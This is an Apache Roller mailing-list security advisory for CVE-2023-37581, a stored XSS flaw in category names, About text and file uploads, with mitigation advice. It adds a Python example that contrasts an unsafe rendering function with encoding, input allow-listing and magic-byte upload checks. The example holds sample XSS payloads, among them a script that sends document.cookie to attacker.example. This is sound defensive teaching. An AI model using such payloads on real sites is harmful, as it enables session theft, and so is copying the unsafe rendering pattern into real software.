Posted to user@roller.apache.org by Dave <sn...@gmail.com> on 2023/08/05 20:12:10 UTC

CVE-2023-37581: Apache Roller: XSS vulnerability for site with untrusted users

The Apache Roller project would like to announce a vulnerability that may
impact Roller installations that allow group blogging with untrusted users.

Severity:

Medium (only impacts group blogging sites with untrusted users)

Description:

Insufficient input validation and sanitization of the Weblog Category name,
Website About and File Upload features in Apache Roller versions before 6.1.2,
on all platforms, allows an authenticated user to perform a cross-site
scripting (XSS) attack.
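
As an added illustration of the vulnerability class named above (this is not
code from Apache Roller and not a reproduction of the reported issue), the
snippet below takes constructed inputs for a category name, an About text and
a few file uploads, and contrasts the unsafe rendering pattern with
context-appropriate output encoding, an input allow-list, and a magic-byte
upload check of the kind that makes uploads from untrusted authors survivable.
All function names, the category-name grammar, the accepted-image list and the
sample payloads are assumptions chosen for the example.

```python
import html
import re
from urllib.parse import quote

# Constructed sample inputs (not from the advisory): what an untrusted author on
# a group blog might submit in the category-name and "About" fields.
CATEGORY_PAYLOAD = '<img src=x onerror=alert(document.domain)>'
ABOUT_PAYLOAD = 'About me <script>fetch("https://attacker.example/?c="+document.cookie)</script>'


def render_category_unsafe(name: str) -> str:
    """The vulnerable pattern: untrusted text concatenated into HTML as-is."""
    return f'<li><a href="/category/{name}">{name}</a></li>'


def render_category_safe(name: str) -> str:
    """Hardened rendering: encode for the context each copy of the value lands in.
    URL path segment -> percent-encoding; HTML text/attribute -> HTML escaping."""
    return (f'<li><a href="/category/{quote(name, safe="")}">'
            f'{html.escape(name, quote=True)}</a></li>')


def render_about_safe(about: str) -> str:
    """For untrusted users the About text is plain text, so it is escaped rather
    than passed through. A field where markup is a feature would instead need an
    allow-list HTML sanitizer; escaping is the right tool only when it is not."""
    return f'<p class="about">{html.escape(about, quote=True)}</p>'


# Assumption for the example: a category name is a short label of word
# characters, spaces and hyphens, at most 64 characters. Rejecting at input time
# is defence in depth on top of output encoding: the value never reaches a
# rendering context that was missed.
CATEGORY_NAME_RE = re.compile(r'\w[\w \-]{0,63}')


def validate_category_name(name: str) -> bool:
    return CATEGORY_NAME_RE.fullmatch(name) is not None


# Allow-list for uploads that will be served from the blog's own origin: only
# raster images, identified by their magic bytes, with a matching extension.
# Anything a browser would render as a document (HTML, SVG, XML, JS) never gets
# past the extension lookup, and a document disguised with an image extension
# fails the signature check.
IMAGE_SIGNATURES = {
    'png': b'\x89PNG\r\n\x1a\n',
    'jpg': b'\xff\xd8\xff',
    'jpeg': b'\xff\xd8\xff',
    'gif': b'GIF8',
}


def upload_is_safe(filename: str, content: bytes) -> bool:
    _, dot, ext = filename.rpartition('.')
    if not dot:
        return False
    signature = IMAGE_SIGNATURES.get(ext.lower())
    return signature is not None and content.startswith(signature)


# Constructed sample uploads. Served from the blog's origin, the first three
# would run script in every reader's browser; the last carries a real PNG header.
SAMPLE_UPLOADS = {
    'stored.html': b'<script>alert(document.domain)</script>',
    'logo.svg': b'<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"/>',
    'photo.png': b'<html><script>alert(1)</script></html>',  # wrong bytes for .png
    'real.png': b'\x89PNG\r\n\x1a\n' + b'\x00' * 16,
}


def audit_uploads(uploads: dict) -> dict:
    """Map each upload name to whether the allow-list would accept it."""
    return {name: upload_is_safe(name, data) for name, data in uploads.items()}


if __name__ == '__main__':
    print('unsafe :', render_category_unsafe(CATEGORY_PAYLOAD))
    print('safe   :', render_category_safe(CATEGORY_PAYLOAD))
    print('valid? :', validate_category_name(CATEGORY_PAYLOAD),
          validate_category_name('Tech Notes'))
    print('about  :', render_about_safe(ABOUT_PAYLOAD))
    for name, ok in audit_uploads(SAMPLE_UPLOADS).items():
        print(f'upload {name}: {"accepted" if ok else "rejected"}')
```

The two rendering functions show why "sanitize on input" alone is not enough:
the same category name is used once as a URL path segment and once as HTML
text, and each context needs its own encoding. The upload check is the reason
the advice to disable File Upload matters on a site with untrusted authors:
any file a browser will interpret as a document, served from the blog's origin,
is script execution for every reader.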

Mitigation:

If you are not running a group blog, then no mitigation is needed. If you are
running a group blog but have not configured Roller for untrusted users, you
also need do nothing, because you have already chosen to trust your users to
author raw HTML and other web content.

If, however, you are running a group blog and do not trust your users to
author HTML, CSS and JavaScript, then you should upgrade to Roller 6.1.2 and
disable Roller's File Upload feature. Roller 6.1.2 is available for download
here: https://roller.apache.org/downloads/downloads.html

Apache Roller would like to thank Srivani Reddy for reporting this
vulnerability.